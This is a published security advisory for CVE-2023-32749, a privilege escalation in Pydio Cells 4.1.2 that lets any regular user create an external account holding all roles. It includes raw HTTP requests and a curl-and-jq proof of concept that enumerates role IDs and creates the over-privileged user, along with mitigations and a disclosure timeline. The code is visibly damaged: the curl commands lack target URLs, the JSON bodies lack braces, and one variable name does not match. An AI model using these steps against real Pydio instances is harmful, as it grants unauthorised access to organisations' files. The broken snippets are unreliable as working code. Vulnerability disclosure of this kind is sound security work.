Pydio Cells 4.1.2 – Unauthorised Role Assignments

  • 作者: RedTeam Pentesting GmbH
    日期: 2023-05-31
  • 类别:
  • 来源:
  • Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments
    Affected Versions: 4.1.2 and earlier versions
    Fixed Versions: 4.2.0, 4.1.3, 3.0.12
    Vulnerability Type: Privilege Escalation
    Security Risk: high
    Vendor URL:
    Vendor Status: notified
    Advisory URL:
    Advisory Status: published
    CVE: CVE-2023-32749
    CVE URL:
    "Pydio Cells is an open-core, self-hosted Document Sharing and
    Collaboration platform (DSC) specifically designed for organizations
    that need advanced document sharing and collaboration without security
    trade-offs or compliance issues."
    (from the vendor's homepage)
    More Details
    Users can share cells or folders with other users on the same Pydio
    instance. The web application allows to either select an already
    existing user from a list or to create a new user by entering a new
    username and password, if this functionality is enabled. When creating a
    new user in this way, a HTTP PUT request like the following is sent:
    PUT /a/user/newuser HTTP/2
    User-Agent: agent
    Authorization: Bearer O48gvjD[...]
    Content-Type: application/json
    Content-Length: 628
    Cookie: token=AO[...]
    "Attributes": {
    "profile": "shared",
    "parameter:core.conf:lang": "\"en-us\"",
    "send_email": "false"
    "Roles": [],
    "Login": "newuser",
    "Password": "secret!",
    "GroupPath": "/",
    "Policies": [...]
    The JSON object sent in the body contains the username and password
    for the user to be created and an empty list for the key "Roles". The
    response contains a JSON object similar to the following:
    "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
    "GroupPath": "/",
    "Attributes": {
    "parameter:core.conf:lang": "\"en-us\"",
    "profile": "shared"
    "Roles": [
    "Uuid": "EXTERNAL_USERS",
    "Label": "External Users",
    "Policies": [...]
    "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
    "Label": "User newuser",
    "UserRole": true,
    "Policies": [...]
    "Login": "newuser",
    "Policies": [....],
    "PoliciesContextEditable": true
    The key "Roles" now contains a list with two objects, which seem to be
    applied by default. The roles list in the HTTP request can be
    modified to contain a list of all available UUIDs for roles, which can
    be obtained by using the user search functionality. This results in a
    new user account with all roles applied. By performing a login as the
    newly created user, access to all cells and non-personal workspaces of
    the whole Pydio instance is granted.
    Proof of Concept
    Login to the Pydio Cells web interface with a regular user and retrieve
    the JWT from the HTTP requests. This can either be done using an HTTP
    attack proxy or using the browser's developer tools. Subsequently, curl [1]
    can be used as follows to retrieve a list of all users and their roles:
    $ export JWT="<insert JWT here>"
    $ curl --silent \
    --header "Authorization: Bearer $TOKEN" \
    --header 'Content-Type: application/json' \
    --data '{}' \ | tee all_users.json
    Afterwards, jq [2] can be used to create a JSON document which can be
    sent to the Pydio REST-API in order to create the external user "foobar"
    with the password "hunter2" and all roles assigned:
    $ jq '.Users[].Roles' all_users.json \
    | jq -s 'flatten | .[].Uuid | {Uuid: .}' \
    | jq -s 'unique' \
    | jq '{"Login": "foobar", "Password": "hunter2", "Attributes":
    {"profile": "shared"}, "Roles": .}' \
    | tee create_user.json
    "Login": "foobar",
    "Password": "hunter2",
    "Attributes": {
    "profile": "shared"
    "Roles": [...]
    Finally, the following curl command can be issued to create the new external
    $ curl --request PUT \
    --silent \
    --header "Authorization: Bearer $JWT" \
    --header 'Content-Type: application/json' \
    --data @create_user.json \
    Now, login with the newly created user to access all cells and
    non-personal workspaces.
    Disallow the creation of external users in the authentication settings.
    Upgrade Pydio Cells to a version without the vulnerability.
    Security Risk
    Attackers with access to any regular user account for a Pydio Cells instance can
    extend their privileges by creating a new external user with all roles
    assigned. Subsequently, they can access all folders and files in any
    cell and workspace, except for personal workspaces. The creation of
    external users is activated by default. Therefore, the vulnerability is
    estimated to pose a high risk.
    2023-03-23 Vulnerability identified
    2023-05-02 Customer approved disclosure to vendor
    2023-05-02 Vendor notified
    2023-05-03 CVE ID requested
    2023-05-08 Vendor released fixed version
    2023-05-14 CVE ID assigned
    2023-05-16 Vendor asks for a few more days before the advisory is released
    2023-05-30 Advisory released
    RedTeam Pentesting GmbH
    RedTeam Pentesting offers individual penetration tests performed by a
    team of specialised IT-security experts. Hereby, security weaknesses in
    company networks or products are uncovered and can be fixed immediately.
    As there are only few experts in this field, RedTeam Pentesting wants to
    share its knowledge and enhance the public knowledge with research in
    security-related areas. The results are made available as public
    security advisories.
    More information about RedTeam Pentesting can be found at:
    Working at RedTeam Pentesting
    RedTeam Pentesting is looking for penetration testers to join our team
    in Aachen, Germany. If you are interested please visit: